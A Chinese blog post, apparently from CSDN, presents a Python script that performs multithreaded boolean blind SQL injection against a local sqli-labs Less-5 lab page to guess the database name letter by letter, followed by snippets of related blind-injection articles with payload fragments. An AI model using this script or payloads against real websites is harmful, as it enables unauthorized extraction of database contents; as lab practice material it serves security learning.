布尔盲注 多线程判断database()名字

最新推荐文章于 2022-11-18 19:50:41 发布
最新推荐文章于 2022-11-18 19:50:41 发布
阅读量354 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: 数据库 python database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/t0410ch/article/details/124723328
版权
该博客探讨了如何使用多线程提高SQL注入扫描的效率。通过Python的_thread模块实现线程并行查询,针对布尔注入场景,利用ElementTree解析XML,requests库发送HTTP请求,对数据库名进行逐字猜测,从而加快扫描速度。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#网上大多是单线程查询,效率过慢,此旨在开发多线程扫描
from turtle import update
from xml.etree.ElementTree import tostring
import requests
import _thread
import time

def thread_check(ipz):
    global jia
    global database_name
    for tail in chars:
        html_head="http://127.0.0.1/sqli-labs/Less-5/?id=1' and mid(database(),"+str(ipz+1)+",1)='"+tail+"' %23"#-->拼接布尔注入的代码
        html_check=requests.get(html_head)
        html_check_bytes=html_check.content
        html_check_str=html_check_bytes.decode()
        if(html_check_str==html_str):
            update_shu=tail+str(ipz)
            database_name[ipz]=tail
            print(database_name)
            jia=jia+1
            break

html = requests.get('http://127.0.0.1/sqli-labs/Less-5/?id=1')#得到一个Response对象
html_bytes = html.content#属性.content用来显示bytes型网页的源代码
html_str = html_bytes.decode()#属性.decode()用来把bytes型的数据解码为字符串型的数据,默认编码格式UTF-8  -->这里存着正确的界面
database_name=[0,0,0,0,0,0,0,0]#根据判断出的database()名的length来定义数组
chars=[]
jia=0
for i in range(97,123):
    chars.append(chr(i))
for ipz in range(8):    
    try:
        _thread.start_new_thread( thread_check, (ipz,) )
    except:
        print ("Error: 无法启动线程")
while 1:
    pass
布尔盲注-
晨辰.的博客
03-25 3019
布尔盲注
比二分法更OK的盲注多线程python脚本)
jpygx123的博客
11-21 1518
 废话不多说直接上代码: import threading import requests user_agent = [ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", "Mozilla/5...
【Less-8】盲注之布尔盲注
ssrf
10-29 1832
目录一、知识铺垫1、substr字符串截取函数2、sql中limit使用3、python中的string模块二、布尔盲注复现1、测试注入点2、判断数据库名长度3、猜数据库名4、判断表名长度5、猜表名6、判断字段名长度7、猜字段名8、判断数据长度9、猜数据 一、知识铺垫 SQL操作函数: 1、substr字符串截取函数 语法: substr(string,start,length) 例如: select substr(‘abcdefg’,3,4) from dual;【结果是cdef】 select .
过滤逗号的二分查找+多线程sql盲注脚本
ruyueattention
09-19 967
前言 之前在做渗透测试时,sqlmap跑出一个单引号闭合的sql注入,但当我想爆库、爆表时,不知道后台做了什么限制,sqlmap始终无法跑出来 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import
[极客大挑战 2019]FinalSQL(异或盲注,二分法加多线程
weixin_43610673的博客
06-16 708
点到第三个找到注入点,异或盲注,但这题很恶心,最后爆值的时候flag前面有很多无用信息,遂将这题当作脚本编写练习题,将嫖来的二分法脚本加上了多线程(只用二分法要跑10分钟) 这是别人博客嫖来的二分法注入脚本 https://www.cnblogs.com/wangtanzhi/p/12305052.html #sql injection.py # -*- coding: UTF-8 -*- import re import requests import string url = "http://1de
【SQL注入-14】布尔盲注的半自动化注入案例—以sqli-labs-less8为例(利用BurpSuite工具)
m0_64378913的博客
05-12 1740
目录1 概述2 布尔盲注的半自动化注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。 布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
布尔盲注脚本
最新发布
03-21
### 布尔盲注脚本实现 ...为了提高效率和准确性,可以进一步优化该脚本的功能,比如加入代理支持、超时处理机制或是多线程并发执行等特性。然而,请始终遵循法律法规及道德准则,在合法范围内开展渗透测试活动。
[Less-8][sqli靶场]布尔盲注
qq_37301470的博客
11-13 595
Less-8 打开发现只有两种回显 you are in… 和 无回显 正好对应布尔型盲注的两个状态 首先判断注入类型(字符,数字) ?id=1 and 1=2 返回了you are in 可是这个逻辑是错的 故而不是数字型 尝试字符型 ?id=-1' or '1' ='2 ?id=1' and '1'='2 判断为字符型 payload i代表爆破的当前位数 j代表所有小写字母 对这两进行遍历 payload:?id=1' and ord(substr((sql),i,1))=ascii(j)
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 3824
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
SQL注入——渗透day07
qq_62716256的博客
09-01 1102
wql注入
【SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1990
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带入参数为真
Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 2048
python实现sqli-labs第15关post盲注的二分法注入脚本(基于布尔盲注
布尔盲注详解
热门推荐
AaronLuo
08-27 1万+
布尔盲注 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息 ascii() 函数,返回字符ascii码值 参数 : str单字符 length() 函数,返回字符串的长度 参数 : str 字...
一个盲注(附盲注脚本)
weixin_30797199的博客
10-13 521
这两天做这个Wechall的盲注,本来不想发Wechall的题解,但是这个题拖了我两天时间,发出来纪念下………… 题目链接 就是个简单的盲注,正误通过页面有无关键字确定。但是有请求次数限制,128次。 需要我猜的密码,长度是32,每一位组成元素有16种可能。也就是说,如果顺序查找,按算法复杂度O(n)算,一位最多可能跑16次,远超128次限制。所以考虑用二分法来猜,二分法算法复杂度O(log...
基于时间的盲注-based time
weixin_44749329的博客
04-08 1454
什么是基于时间的盲注 如果说基于boolean的盲注在页面上还可以看到0 or 1的回显的话,那么基于time的盲注就什么也看不到了! 但是有个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确定注入! 下面我会通过演示来让大家了解基于时间的盲注 首先打开pikachu种的SQL-Inject 中的盲注(base on time) 我们先输入一个单引号,点击查询 这个地方是没有...
布尔型盲注基本思路
刘启明
06-10 2446
普通SQL注入 SQL盲注 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上直接就会显示执行sql语句的结果 一般在页面上不会直接显示sql执行的结果 有可能出现不确定sql是否执...
墨者 - SQL注入漏洞测试(时间盲注)
吃肉唐僧的博客
07-08 1435
按照题意,正规思路 flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+ 通告sleep()函数判断数据长度 然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+ 用bp字典结合substr函数爆库==&gt...
MSSQL手工盲注总结
kuxing100的专栏
07-31 2887
原文:http://hi.baidu.com/microjordan45/item/bd2c33d74ae813d8241f403e 作者:oldjun 好多人贴了2005注入语句,基本是显错模式的,如果显错,很多工具还是可以用的;但盲注,工具貌似就不咋地了,pangolin注不了2005,其他2005注入的注入工具对于盲注貌似也很感冒;网上没几个盲注语句,于是平时用到的时候自己写
【SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 8718
【SQL注入-无回显】
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值